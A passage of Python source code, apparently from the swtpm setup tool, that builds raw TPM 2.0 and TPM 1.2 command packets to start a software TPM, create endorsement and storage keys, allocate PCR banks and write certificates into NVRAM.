1\n\n def remove_pidfile(self):\n \"\"\" Remove the pidfile if it exists \"\"\"\n\n if self.pidfile:\n try:\n os.remove(self.pidfile)\n except Exception:\n pass\n\n def stop(self):\n \"\"\" Stop the running swtpm instance \"\"\"\n\n if self.swtpm_proc:\n if not self.swtpm_proc.poll():\n self.ctrl_shutdown()\n try:\n self.swtpm_proc.wait(timeout=0.5)\n except subprocess.TimeoutExpired:\n self.swtpm_proc.kill()\n self.swtpm_proc.wait()\n self.swtpm_proc = None\n self.remove_pidfile()\n\n for sock in [self.data_client_socket, self.data_swtpm_socket,\n self.ctrl_client_socket, self.ctrl_swtpm_socket]:\n if sock:\n sock.close()\n self.data_client_socket = None\n self.data_swtpm_socket = None\n self.ctrl_client_socket = None\n self.ctrl_swtpm_socket = None\n\n def destroy(self):\n \"\"\" Destroy the running swtpm instance \"\"\"\n\n self.stop()\n\n def transfer(self, req, cmdname, use_ctrl=False):\n \"\"\" Send a command to swtpm and receive a response \"\"\"\n\n if use_ctrl:\n sock = self.ctrl_client_socket\n offset = 0\n else:\n sock = self.data_client_socket\n offset = 6\n\n try:\n sock.sendall(req)\n rsp = sock.recv(4096)\n except Exception as err:\n logerr(self.logfile, \"transfer error: %s\\n\" % str(err))\n return None, 1\n\n if not use_ctrl:\n if len(rsp) < 10:\n logerr(self.logfile,\n \"Response for %s has only %d bytes.\\n\" % (cmdname, len(rsp)))\n return None, 1\n\n returncode = struct.unpack(\">I\", rsp[offset:offset+4])[0]\n if returncode != 0:\n logerr(self.logfile, \"%s failed: 0x%x\\n\" % (cmdname, returncode))\n return None, 1\n\n return rsp, 0\n\n def ctrl_init(self):\n \"\"\" Send an Init over the control channel \"\"\"\n\n req = struct.pack(\">I I\", CMD_INIT, 0)\n _, ret = self.transfer(req, \"CMD_INIT\", use_ctrl=True)\n return ret\n\n def ctrl_shutdown(self):\n \"\"\" Send an Init over the control channel \"\"\"\n\n req = struct.pack(\">I\", CMD_SHUTDOWN)\n _, ret = self.transfer(req, \"CMD_SHUTDOWN\", use_ctrl=True)\n return ret\n\n def ctrl_get_tpm_specs_and_attrs(self):\n \"\"\" Get the TPM specification parameters over the control channel \"\"\"\n\n req = struct.pack(\">I QII\", CMD_GET_INFO,\n TPMLIB_INFO_TPMSPECIFICATION | TPMLIB_INFO_TPMATTRIBUTES, 0, 0)\n rsp, ret = self.transfer(req, \"CMD_GET_INFO\", use_ctrl=True)\n if ret != 0:\n return \"\", 1\n\n length = struct.unpack(\">I\", rsp[8:12])[0]\n # compensate for null-terminated string\n length -= 1\n data = struct.unpack(\"%ds\" % length, rsp[12:12+length])[0]\n\n return data.decode(), 0\n\n#\n# TPM 2 support\n#\n\nTPM2_ST_NO_SESSIONS = 0x8001\nTPM2_ST_SESSIONS = 0x8002\n\nTPM2_CC_EVICTCONTROL = 0x00000120\nTPM2_CC_NV_DEFINESPACE = 0x0000012a\nTPM2_CC_PCR_ALLOCATE = 0x0000012b\nTPM2_CC_CREATEPRIMARY = 0x00000131\nTPM2_CC_NV_WRITE = 0x00000137\nTPM2_CC_NV_WRITELOCK = 0x00000138\nTPM2_CC_STARTUP = 0x00000144\nTPM2_CC_SHUTDOWN = 0x00000145\nTPM2_CC_GETCAPABILITY = 0x0000017a\n\nTPM2_SU_CLEAR = 0x0000\n\nTPM2_RH_OWNER = 0x40000001\nTPM2_RS_PW = 0x40000009\nTPM2_RH_ENDORSEMENT = 0x4000000b\nTPM2_RH_PLATFORM = 0x4000000c\n\nTPM2_ALG_RSA = 0x0001\nTPM2_ALG_SHA1 = 0x0004\nTPM2_ALG_AES = 0x0006\nTPM2_ALG_SHA256 = 0x000b\nTPM2_ALG_SHA384 = 0x000c\nTPM2_ALG_SHA512 = 0x000d\nTPM2_ALG_SHA3_256 = 0x0027\nTPM2_ALG_SHA3_384 = 0x0028\nTPM2_ALG_SHA3_512 = 0x0028\nTPM2_ALG_NULL = 0x0010\nTPM2_ALG_SM3 = 0x0012\nTPM2_ALG_ECC = 0x0023\nTPM2_ALG_CFB = 0x0043\n\nTPM2_CAP_PCRS = 0x00000005\n\nTPM2_ECC_NIST_P384 = 0x0004\n\nTPMA_NV_PLATFORMCREATE = 0x40000000\nTPMA_NV_AUTHREAD = 0x40000\nTPMA_NV_NO_DA = 0x2000000\nTPMA_NV_PPWRITE = 0x1\nTPMA_NV_PPREAD = 0x10000\nTPMA_NV_OWNERREAD = 0x20000\nTPMA_NV_WRITEDEFINE = 0x2000\n\n# Use standard EK Cert NVRAM, EK and SRK handles per IWG spec.\n# \"TCG TPM v2.0 Provisioning Guide\"; Version 1.0, Rev 1.0, March 15, 2017\n# Table 2\nTPM2_NV_INDEX_RSA2048_EKCERT = 0x01c00002\nTPM2_NV_INDEX_RSA2048_EKTEMPLATE = 0x01c00004\nTPM2_NV_INDEX_RSA3072_HI_EKCERT = 0x01c0001c\nTPM2_NV_INDEX_RSA3072_HI_EKTEMPLATE = 0x01c0001d\n# For ECC follow \"TCG EK Credential Profile For TPM Family 2.0; Level 0\"\n# Specification Version 2.1; Revision 13; 10 December 2018\nTPM2_NV_INDEX_PLATFORMCERT = 0x01c08000\n\nTPM2_NV_INDEX_ECC_SECP384R1_HI_EKCERT = 0x01c00016\nTPM2_NV_INDEX_ECC_SECP384R1_HI_EKTEMPLATE = 0x01c00017\n\nTPM2_EK_RSA_HANDLE = 0x81010001\nTPM2_EK_RSA3072_HANDLE = 0x8101001c\nTPM2_EK_ECC_SECP384R1_HANDLE = 0x81010016\nTPM2_SPK_HANDLE = 0x81000001\n\nNONCE_EMPTY = struct.pack('>H', 0)\nNONCE_RSA2048 = struct.pack('>H256s', 0x100, ('\\0' * 0x100).encode())\nNONCE_RSA3072 = struct.pack('>H384s', 0x180, ('\\0' * 0x180).encode())\nNONCE_ECC_384 = struct.pack('>H48s', 0x30, ('\\0' * 0x30).encode())\n\nPCR_BANKS_TO_NAMES = {\n TPM2_ALG_SHA1: \"sha1\",\n TPM2_ALG_SHA256: \"sha256\",\n TPM2_ALG_SHA384: \"sha384\",\n TPM2_ALG_SHA512: \"sha512\",\n TPM2_ALG_SM3: \"sm3-256\",\n TPM2_ALG_SHA3_256: \"sha3-256\",\n TPM2_ALG_SHA3_384: \"sha3-384\",\n TPM2_ALG_SHA3_512: \"sha3-512\",\n}\n\nBANK_NAMES_TO_ALGID = {\n \"sha1\": TPM2_ALG_SHA1,\n \"sha256\": TPM2_ALG_SHA256,\n \"sha384\": TPM2_ALG_SHA384,\n \"sha512\": TPM2_ALG_SHA512,\n \"sm3-256\": TPM2_ALG_SM3,\n \"sha3-256\": TPM2_ALG_SHA3_256,\n \"sha3-384\": TPM2_ALG_SHA3_384,\n \"sha3-512\": TPM2_ALG_SHA3_512,\n}\n\n\nclass Swtpm2(Swtpm):\n \"\"\" Class for manufacturing a swtpm TPM 2 \"\"\"\n\n def __init__(self, swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass):\n \"\"\" Class constructor\n swtpm_exec_l is a list like [\"swtpm\", \"socket\"]\n \"\"\"\n\n super(Swtpm2, self).__init__(swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass,\n is_tpm2=True)\n\n def shutdown(self):\n \"\"\" Shut down the TPM 2 \"\"\"\n\n fmt = \">HII H\"\n req = struct.pack(fmt,\n TPM2_ST_NO_SESSIONS, struct.calcsize(fmt), TPM2_CC_SHUTDOWN,\n TPM2_SU_CLEAR)\n\n _, ret = self.transfer(req, \"TPM2_Shutdown\")\n return ret\n\n def run_swtpm_bios(self):\n \"\"\" Startup the TPM 2 \"\"\"\n\n fmt = '>HII H'\n req = struct.pack(fmt,\n TPM2_ST_NO_SESSIONS, struct.calcsize(fmt), TPM2_CC_STARTUP,\n TPM2_SU_CLEAR)\n _, ret = self.transfer(req, \"TPM2_Startup\")\n return ret\n\n def get_all_pcr_banks(self):\n \"\"\" Get all available PCR banks \"\"\"\n\n fmt = '>HII III'\n req = struct.pack(fmt,\n TPM2_ST_NO_SESSIONS, struct.calcsize(fmt), TPM2_CC_GETCAPABILITY,\n TPM2_CAP_PCRS, 0, 64)\n rsp, ret = self.transfer(req, \"TPM2_GetCapability\")\n if ret != 0:\n return [], 1\n\n count = struct.unpack('>H', rsp[17:19])[0]\n offset = 19\n\n res = []\n for _ in range(count):\n bank, length = struct.unpack('>HB', rsp[offset:offset+3])\n name = PCR_BANKS_TO_NAMES[bank]\n if name:\n res.append(name)\n else:\n res.append('%02x' % bank)\n offset += 2 + 1 + length\n\n return res, 0\n\n def set_active_pcr_banks(self, pcr_banks, all_pcr_banks):\n \"\"\" Set the list of active PCR banks to the one the user wants \"\"\"\n\n pcrselects = \"\".encode()\n count = 0\n active = []\n\n # enable the ones the user wants\n for pcr_bank in pcr_banks:\n if pcr_bank not in all_pcr_banks:\n # Skip if not even available\n continue\n try:\n hashalg = BANK_NAMES_TO_ALGID[pcr_bank]\n except KeyError:\n continue\n\n active.insert(0, pcr_bank)\n pcrselects += struct.pack('>H BBBB', hashalg, 3, 0xff, 0xff, 0xff)\n\n #print(\"activate hashalg = %d\\n\" % hashalg)\n count += 1\n\n if len(active) == 0:\n logerr(self.logfile,\n \"No PCR banks could be allocated. None of the selected algorithms are \"\n \"supported.\\n\")\n return [], 1\n\n # disable the rest\n for pcr_bank in all_pcr_banks:\n if pcr_bank in pcr_banks:\n # Skip if to activate\n continue\n\n try:\n hashalg = BANK_NAMES_TO_ALGID[pcr_bank]\n except KeyError:\n continue\n\n #print(\"deactivate hashalg = %d\\n\" % hashalg)\n pcrselects += struct.pack('>H BBBB', hashalg, 3, 0, 0, 0)\n count += 1\n\n authblock = struct.pack('>I HBH', TPM2_RS_PW, 0, 0, 0)\n fmt = '>HII I I%ds I %ds' % (len(authblock), len(pcrselects))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_PCR_ALLOCATE,\n TPM2_RH_PLATFORM,\n len(authblock), authblock,\n count,\n pcrselects)\n\n _, ret = self.transfer(req, \"TPM2_PCR_Allocate\")\n\n return active, ret\n\n def evictcontrol(self, curr_handle, perm_handle):\n \"\"\" Make object at the curr_handler permanent with the perm_handle \"\"\"\n\n authblock = struct.pack('>IHBH', TPM2_RS_PW, 0, 0, 0)\n\n fmt = '>HII II I%ds I' % len(authblock)\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_EVICTCONTROL,\n TPM2_RH_OWNER, curr_handle,\n len(authblock), authblock,\n perm_handle)\n\n _, ret = self.transfer(req, \"TPM2_EvictControl\")\n return ret\n\n def createprimary_ek_rsa(self, rsa_keysize, allowsigning, decryption):\n \"\"\" Create an RSA Ek \"\"\"\n\n if rsa_keysize == 2048:\n authpolicy = b'\\x83\\x71\\x97\\x67\\x44\\x84\\xb3\\xf8\\x1a\\x90\\xcc\\x8d' \\\n b'\\x46\\xa5\\xd7\\x24\\xfd\\x52\\xd7\\x6e\\x06\\x52\\x0b\\x64' \\\n b'\\xf2\\xa1\\xda\\x1b\\x33\\x14\\x69\\xaa'\n keyflags = 0\n symkeylen = 128\n havenonce = True\n addlen = 0\n elif rsa_keysize == 3072:\n authpolicy = b'\\xB2\\x6E\\x7D\\x28\\xD1\\x1A\\x50\\xBC\\x53\\xD8\\x82\\xBC' \\\n b'\\xF5\\xFD\\x3A\\x1A\\x07\\x41\\x48\\xBB\\x35\\xD3\\xB4\\xE4' \\\n b'\\xCB\\x1C\\x0A\\xD9\\xBD\\xE4\\x19\\xCA\\xCB\\x47\\xBA\\x09' \\\n b'\\x69\\x96\\x46\\x15\\x0F\\x9F\\xC0\\x00\\xF3\\xF8\\x0E\\x12'\n keyflags = 0x40\n symkeylen = 256\n havenonce = False\n addlen = 16\n\n if allowsigning and decryption:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # adminWithPolicy, sign, decrypt\n keyflags = keyflags | 0x000600b2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 72 + addlen\n elif allowsigning:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # adminWithPolicy, sign\n keyflags = keyflags | 0x000400b2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 72 + addlen\n else:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # adminWithPolicy, restricted, decrypt\n keyflags = keyflags | 0x000300b2\n # symmetric: TPM_ALG_AES, 128bit or 256bit, TPM_ALG_CFB\n symkeydata = struct.pack(\">HHH\", TPM2_ALG_AES, symkeylen, TPM2_ALG_CFB)\n off = 76 + addlen\n\n return self._createprimary_rsa(TPM2_RH_ENDORSEMENT, keyflags, symkeydata, authpolicy,\n rsa_keysize, havenonce, off)\n\n def _createprimary_rsa(self, primaryhandle, keyflags, symkeydata, authpolicy,\n rsa_keysize, havenonce, off):\n \"\"\" Create an RSA key with the given parameters \"\"\"\n\n if rsa_keysize == 2048:\n nonce = NONCE_RSA2048\n hashalg = TPM2_ALG_SHA256\n elif rsa_keysize == 3072:\n if not havenonce:\n nonce = NONCE_EMPTY\n else:\n nonce = NONCE_RSA3072\n hashalg = TPM2_ALG_SHA384\n else:\n logerr(self.logfile, \"Unsupported keysize %d\\n\" % rsa_keysize)\n return b'', \"\", 0, 1\n\n authblock = struct.pack('>IHBH', TPM2_RS_PW, 0, 0, 0)\n\n fmt = '>HHI H%ds %ds HH I %ds' % \\\n (len(authpolicy), len(symkeydata), len(nonce))\n public = struct.pack(fmt,\n TPM2_ALG_RSA, hashalg, keyflags,\n len(authpolicy), authpolicy,\n symkeydata,\n TPM2_ALG_NULL, rsa_keysize,\n 0,\n nonce)\n ek_template = public\n\n fmt = \">HII I I%ds HI H%ds IH\" % (len(authblock), len(public))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_CREATEPRIMARY,\n primaryhandle,\n len(authblock), authblock,\n 4, 0,\n len(public), public,\n 0, 0)\n rsp, ret = self.transfer(req, \"TPM2_CreatePrimary\")\n if ret != 0:\n return b'', \"\", 0, 1\n\n handle = struct.unpack(\">I\", rsp[10:14])[0]\n\n modlen = struct.unpack(\">H\", rsp[off:off+2])[0]\n if modlen != rsa_keysize >> 3:\n logerr(self.logfile, \"RSA key: Getting modulus from wrong offset %d\\n\" % off)\n return b'', \"\", 0, 1\n off += 2\n ekparam = struct.unpack(\">%ds\" % modlen, rsp[off:off+modlen])[0].hex()\n\n return ek_template, ekparam, handle, 0\n\n def _createprimary_ecc(self, primaryhandle, keyflags, symkeydata, authpolicy,\n curveid, hashalg, nonce, off):\n \"\"\" Create an ECC key with the given parameters \"\"\"\n\n authblock = struct.pack('>IHBH', TPM2_RS_PW, 0, 0, 0)\n\n fmt = '>HHI H%ds %ds HH H %ds%ds' % \\\n (len(authpolicy), len(symkeydata), len(nonce), len(nonce))\n public = struct.pack(fmt,\n TPM2_ALG_ECC, hashalg, keyflags,\n len(authpolicy), authpolicy,\n symkeydata,\n TPM2_ALG_NULL, curveid,\n TPM2_ALG_NULL,\n nonce, nonce)\n ek_template = public\n\n fmt = '>HII I I%ds HI H%ds IH' % (len(authblock), len(public))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_CREATEPRIMARY,\n primaryhandle,\n len(authblock), authblock,\n 4, 0,\n len(public), public,\n 0, 0)\n rsp, ret = self.transfer(req, \"TPM2_CreatePrimary\")\n if ret != 0:\n return b'', \"\", 0, 1\n\n handle = struct.unpack('>I', rsp[10:14])[0]\n\n if curveid == TPM2_ECC_NIST_P384:\n exp_ksize = 48\n cid = \"secp384r1\"\n else:\n logerr(self.logfile, \"Unknown curveid 0x%x\\n\" % curveid)\n return b'', \"\", 0, 1\n\n ksize1 = struct.unpack('>H', rsp[off:off+2])[0]\n off2 = off + 2 + ksize1\n ksize2 = struct.unpack('>H', rsp[off2:off2+2])[0]\n\n if ksize1 != exp_ksize or ksize2 != exp_ksize:\n logerr(self.logfile, \"ECC: Getting key parameters from wrong offset\\n\")\n return b'', \"\", 0, 1\n\n off += 2\n xparam = struct.unpack(\">%ds\" % ksize1, rsp[off:off+ksize1])[0]\n off2 += 2\n yparam = struct.unpack(\">%ds\" % ksize2, rsp[off2:off2+ksize2])[0]\n\n ekparam = \"x=%s,y=%s,id=%s\" % (xparam.hex(), yparam.hex(), cid)\n\n return ek_template, ekparam, handle, 0\n\n def createprimary_spk_ecc_nist_p384(self):\n \"\"\" Create a NIST p384 ECC SPK \"\"\"\n\n keyflags = 0x00030472\n symkeydata = struct.pack('>HHH', TPM2_ALG_AES, 256, TPM2_ALG_CFB)\n authpolicy = b''\n off = 42\n\n return self._createprimary_ecc(TPM2_RH_OWNER, keyflags, symkeydata, authpolicy,\n TPM2_ECC_NIST_P384, TPM2_ALG_SHA384, NONCE_ECC_384, off)\n\n def createprimary_spk_rsa(self, rsa_keysize):\n \"\"\" Create a primary RSA key with the given keysize \"\"\"\n\n keyflags = 0x00030472\n authpolicy = ''.encode()\n\n if rsa_keysize == 2048:\n symkeylen = 128\n elif rsa_keysize == 3072:\n symkeylen = 256\n symkeydata = struct.pack('>HHH', TPM2_ALG_AES, symkeylen, TPM2_ALG_CFB)\n off = 44\n\n return self._createprimary_rsa(TPM2_RH_OWNER, keyflags, symkeydata, authpolicy,\n rsa_keysize, True, off)\n\n def create_spk(self, isecc, rsa_keysize):\n \"\"\" Create either an ECC or RSA storage primary key \"\"\"\n\n if isecc:\n _, _, handle, ret = self.createprimary_spk_ecc_nist_p384()\n else:\n _, _, handle, ret = self.createprimary_spk_rsa(rsa_keysize)\n\n if ret != 0:\n return 1\n\n ret = self.evictcontrol(handle, TPM2_SPK_HANDLE)\n if ret == 0:\n logit(self.logfile,\n \"Successfully created storage primary key with handle 0x%x.\\n\" % TPM2_SPK_HANDLE)\n\n return ret\n\n def createprimary_ek_ecc_nist_p384(self, allowsigning, decryption):\n \"\"\" Create en ECC EK key that may be allowed to sign and/or decrypt \"\"\"\n\n if allowsigning and decryption:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # userWithAuth, adminWithPolicy, sign, decrypt\n keyflags = 0x000600f2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 86\n elif allowsigning:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # userWithAuth, adminWithPolicy, sign\n keyflags = 0x000400f2\n # symmetric: TPM_ALG_NULL\n symkeydata = struct.pack(\">H\", TPM2_ALG_NULL)\n off = 86\n else:\n # keyflags: fixedTPM, fixedParent, sensitiveDatOrigin,\n # userWithAuth, adminWithPolicy, restricted, decrypt\n keyflags = 0x000300f2\n # symmetric: TPM_ALG_AES, 256bit, TPM_ALG_CFB\n symkeydata = struct.pack(\">HHH\", TPM2_ALG_AES, 256, TPM2_ALG_CFB)\n off = 90\n\n\t# authPolicy from Ek Credential Profile; Spec v 2.1; rev12; p. 43\n authpolicy = b'\\xB2\\x6E\\x7D\\x28\\xD1\\x1A\\x50\\xBC\\x53\\xD8\\x82\\xBC' \\\n b'\\xF5\\xFD\\x3A\\x1A\\x07\\x41\\x48\\xBB\\x35\\xD3\\xB4\\xE4' \\\n b'\\xCB\\x1C\\x0A\\xD9\\xBD\\xE4\\x19\\xCA\\xCB\\x47\\xBA\\x09' \\\n b'\\x69\\x96\\x46\\x15\\x0F\\x9F\\xC0\\x00\\xF3\\xF8\\x0E\\x12'\n\n ek_template, ekparam, handle, ret = \\\n self._createprimary_ecc(TPM2_RH_ENDORSEMENT, keyflags, symkeydata, authpolicy,\n TPM2_ECC_NIST_P384, TPM2_ALG_SHA384, NONCE_EMPTY, off)\n if ret != 0:\n logerr(self.logfile, \"create_spk_ecc failed\\n\")\n\n return ek_template, ekparam, handle, ret\n\n def create_ek(self, isecc, rsa_keysize, allowsigning, decryption, lock_nvram):\n \"\"\" Create an ECC or RSA EK \"\"\"\n\n if isecc:\n tpm2_ek_handle = TPM2_EK_ECC_SECP384R1_HANDLE\n keytype = \"ECC\"\n nvindex = TPM2_NV_INDEX_ECC_SECP384R1_HI_EKTEMPLATE\n else:\n if rsa_keysize == 2048:\n tpm2_ek_handle = TPM2_EK_RSA_HANDLE\n nvindex = TPM2_NV_INDEX_RSA2048_EKTEMPLATE\n elif rsa_keysize == 3072:\n tpm2_ek_handle = TPM2_EK_RSA3072_HANDLE\n nvindex = TPM2_NV_INDEX_RSA3072_HI_EKTEMPLATE\n keytype = \"RSA %d\" % rsa_keysize\n\n if isecc:\n ek_template, ekparam, handle, ret = \\\n self.createprimary_ek_ecc_nist_p384(allowsigning, decryption)\n else:\n ek_template, ekparam, handle, ret = \\\n self.createprimary_ek_rsa(rsa_keysize, allowsigning, decryption)\n\n if ret == 0:\n ret = self.evictcontrol(handle, tpm2_ek_handle)\n if ret != 0:\n logerr(self.logfile, \"create_ek failed\\n\")\n return \"\", 1\n\n logit(self.logfile,\n \"Successfully created %s EK with handle 0x%x.\\n\" % (keytype, tpm2_ek_handle))\n\n if allowsigning:\n nvindexattrs = TPMA_NV_PLATFORMCREATE | \\\n\t\tTPMA_NV_AUTHREAD | \\\n\t\tTPMA_NV_OWNERREAD | \\\n\t\tTPMA_NV_PPREAD | \\\n\t\tTPMA_NV_PPWRITE | \\\n\t\tTPMA_NV_NO_DA | \\\n\t\tTPMA_NV_WRITEDEFINE\n ret = self.write_nvram(nvindex, nvindexattrs, ek_template, lock_nvram, \"EK template\")\n if ret == 0:\n logit(self.logfile,\n \"Successfully created NVRAM area 0x%x for %s EK template.\\n\" %\n (nvindex, keytype))\n\n return ekparam, ret\n\n def nv_definespace(self, nvindex, nvindexattrs, size):\n \"\"\" Define an NVIndex with attributes and given size \"\"\"\n\n authblock = struct.pack(\">IHBH\", TPM2_RS_PW, 0, 0, 0)\n\n nvpublic = struct.pack('>IHI H H',\n nvindex, TPM2_ALG_SHA256, nvindexattrs,\n 0,\n size)\n\n fmt = \">HII I I%ds H H%ds\" % (len(authblock), len(nvpublic))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_NV_DEFINESPACE,\n TPM2_RH_PLATFORM,\n len(authblock), authblock,\n 0,\n len(nvpublic), nvpublic)\n\n _, ret = self.transfer(req, \"TPM2_NV_DefineSpace\")\n return ret\n\n def nv_write(self, nvindex, data):\n \"\"\" Write the data into the given NVIndex \"\"\"\n\n authblock = struct.pack(\">IHBH\", TPM2_RS_PW, 0, 0, 0)\n\n offset = 0\n stepsize = 1024\n\n while offset < len(data):\n if offset + stepsize < len(data):\n buf = data[offset : offset + stepsize]\n else:\n buf = data[offset : len(data)]\n\n fmt = \">HII II I%ds H%dsH\" % (len(authblock), len(buf))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_NV_WRITE,\n TPM2_RH_PLATFORM, nvindex,\n len(authblock), authblock,\n len(buf), buf, offset)\n\n _, ret = self.transfer(req, \"TPM2_NV_Write\")\n if ret != 0:\n return 1\n\n offset += stepsize\n\n return 0\n\n def nv_writelock(self, nvindex):\n \"\"\" Lock the given index \"\"\"\n\n authblock = struct.pack(\">IHBH\", TPM2_RS_PW, 0, 0, 0)\n\n fmt = \">HII II I%ds\" % (len(authblock))\n req = struct.pack(fmt,\n TPM2_ST_SESSIONS, struct.calcsize(fmt), TPM2_CC_NV_WRITELOCK,\n TPM2_RH_PLATFORM, nvindex,\n len(authblock), authblock)\n\n _, ret = self.transfer(req, \"TPM2_NV_WriteLock\")\n return ret\n\n def write_nvram(self, nvindex, nvindexattrs, data, lock_nvram, purpose):\n \"\"\" Define NVRAM space, write data to it and lock it if wanted \"\"\"\n\n ret = self.nv_definespace(nvindex, nvindexattrs, len(data))\n if ret != 0:\n logerr(self.logfile, \"Could not create NVRAM area 0x%x for %s.\\n\" % (nvindex, purpose))\n return 1\n\n ret = self.nv_write(nvindex, data)\n if ret != 0:\n logerr(self.logfile,\n \"Could not write %s into NVRAM area 0x%x.\\n\" % (purpose, nvindex))\n return 1\n\n if lock_nvram:\n ret = self.nv_writelock(nvindex)\n if ret != 0:\n logerr(self.logfile, \"Could not lock EK template NVRAM area 0x%x.\\n\" % nvindex)\n return 1\n\n return ret\n\n def write_ek_cert_nvram(self, isecc, rsa_keysize, lock_nvram, ekcert):\n \"\"\" Write the given ekcert into an NVRAM area appropriate for the key type and size \"\"\"\n\n if not isecc:\n if rsa_keysize == 2048:\n nvindex = TPM2_NV_INDEX_RSA2048_EKCERT\n elif rsa_keysize == 3072:\n nvindex = TPM2_NV_INDEX_RSA3072_HI_EKCERT\n keytype = \"RSA %d\" % rsa_keysize\n else:\n nvindex = TPM2_NV_INDEX_ECC_SECP384R1_HI_EKCERT\n keytype = \"ECC\"\n\n nvindexattrs = TPMA_NV_PLATFORMCREATE | \\\n TPMA_NV_AUTHREAD | \\\n TPMA_NV_OWNERREAD | \\\n TPMA_NV_PPREAD | \\\n TPMA_NV_PPWRITE | \\\n TPMA_NV_NO_DA | \\\n TPMA_NV_WRITEDEFINE\n ret = self.write_nvram(nvindex, nvindexattrs, ekcert, lock_nvram, \"EK Certificate\")\n if ret == 0:\n logit(self.logfile,\n \"Successfully created NVRAM area 0x%x for %s EK certificate.\\n\" %\n (nvindex, keytype))\n else:\n logerr(self.logfile,\n \"Could not create NVRAM area 0x%x for %s EK certificate.\\n\" %\n (nvindex, keytype))\n return ret\n\n def write_platform_cert_nvram(self, lock_nvram, platformcert):\n \"\"\" Write the platform certificate into an NVRAM area \"\"\"\n\n nvindex = TPM2_NV_INDEX_PLATFORMCERT\n nvindexattrs = TPMA_NV_PLATFORMCREATE | \\\n TPMA_NV_AUTHREAD | \\\n TPMA_NV_OWNERREAD | \\\n TPMA_NV_PPREAD | \\\n TPMA_NV_PPWRITE | \\\n TPMA_NV_NO_DA | \\\n TPMA_NV_WRITEDEFINE\n ret = self.write_nvram(nvindex, nvindexattrs, platformcert, lock_nvram,\n \"Platform Certificate\")\n if ret == 0:\n logit(self.logfile,\n \"Successfully created NVRAM area 0x%x for platform certificate.\\n\" % nvindex)\n else:\n logerr(self.logfile,\n \"Could not create NVRAM area 0x%x for platform certificate.\\n\" % nvindex)\n return ret\n\n\n#\n# TPM 1.2 support\n#\n\nTPM_TAG_RQU_COMMAND = 0x00c1\nTPM_TAG_RQU_AUTH1_COMMAND = 0x00c2\n\nTPM_ORD_OIAP = 0x0000000A\nTPM_ORD_OSAP = 0x0000000B\nTPM_ORD_TAKE_OWNERSHIP = 0x0000000D\nTPM_ORD_OWNER_CLEAR = 0x0000005B\nTPM_ORD_PHYSICAL_ENABLE = 0x0000006F\nTPM_ORD_PHYSICAL_SET_DEACTIVATED = 0x00000072\nTPM_ORD_STARTUP = 0x00000099\nTPM_ORD_NV_DEFINE_SPACE = 0x000000CC\nTPM_ORD_NV_WRITE_VALUE = 0x000000CD\nTSC_ORD_PHYSICAL_PRESENCE = 0x4000000A\n\nTPM_ST_CLEAR = 0x0001\n\nTPM_PHYSICAL_PRESENCE_CMD_ENABLE = 0x0020\nTPM_PHYSICAL_PRESENCE_PRESENT = 0x0008\n\nTPM_ALG_RSA = 0x00000001\n\nTPM_KEY_STORAGE = 0x0011\n\nTPM_AUTH_ALWAYS = 0x01\n\nTPM_PID_OWNER = 0x0005\n\nTPM_ES_RSAESOAEP_SHA1_MGF1 = 0x0003\nTPM_SS_NONE = 0x0001\n\nTPM_TAG_PCR_INFO_LONG = 0x0006\nTPM_TAG_NV_ATTRIBUTES = 0x0017\nTPM_TAG_NV_DATA_PUBLIC = 0x0018\nTPM_TAG_KEY12 = 0x0028\n\nTPM_LOC_ZERO = 0x01\nTPM_LOC_ALL = 0x1f\n\nTPM_NV_INDEX_D_BIT = 0x10000000\nTPM_NV_INDEX_EKCERT = 0xF000\nTPM_NV_INDEX_PLATFORMCERT = 0xF002\n\nTPM_NV_INDEX_LOCK = 0xFFFFFFFF\n\nTPM_NV_PER_OWNERREAD = 0x00020000\nTPM_NV_PER_OWNERWRITE = 0x00000002\n\nTPM_ET_OWNER = 0x02\nTPM_ET_NV = 0x0b\n\nTPM_KH_EK = 0x40000006\n\nclass Swtpm12(Swtpm):\n \"\"\" Class for manufacturing a swtpm TPM 1.2 \"\"\"\n\n def __init__(self, swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass):\n \"\"\" Class constructor\n swtpm_exec_l is a list like [\"swtpm\", \"socket\"]\n \"\"\"\n\n super(Swtpm12, self).__init__(swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass)\n\n def startup(self, startup_type):\n \"\"\" Run TPM_Startup() \"\"\"\n\n fmt = \">HII H\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_STARTUP,\n startup_type)\n\n _, ret = self.transfer(req, \"TPM_Startup\")\n return ret\n\n def tsc_physicalpresence(self, physicalpresence):\n \"\"\" Run TSC_PhysicalPresence \"\"\"\n\n fmt = \">HII H\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TSC_ORD_PHYSICAL_PRESENCE,\n physicalpresence)\n\n _, ret = self.transfer(req, \"TSC_PhysicalPresence\")\n return ret\n\n def physical_enable(self):\n \"\"\" Run TPM_PhysicalEnable \"\"\"\n\n fmt = \">HII\"\n req = struct.pack(fmt,\n TPM_TAG_RQU_COMMAND, struct.calcsize(fmt), TPM_ORD_PHYSICAL_ENABLE)\n\n _, ret = self.transfer(req, \"TSC_PhysicalEnable\")\n return ret\n\n def physical_set_deactivated(self, state):\n \"\"\" Run 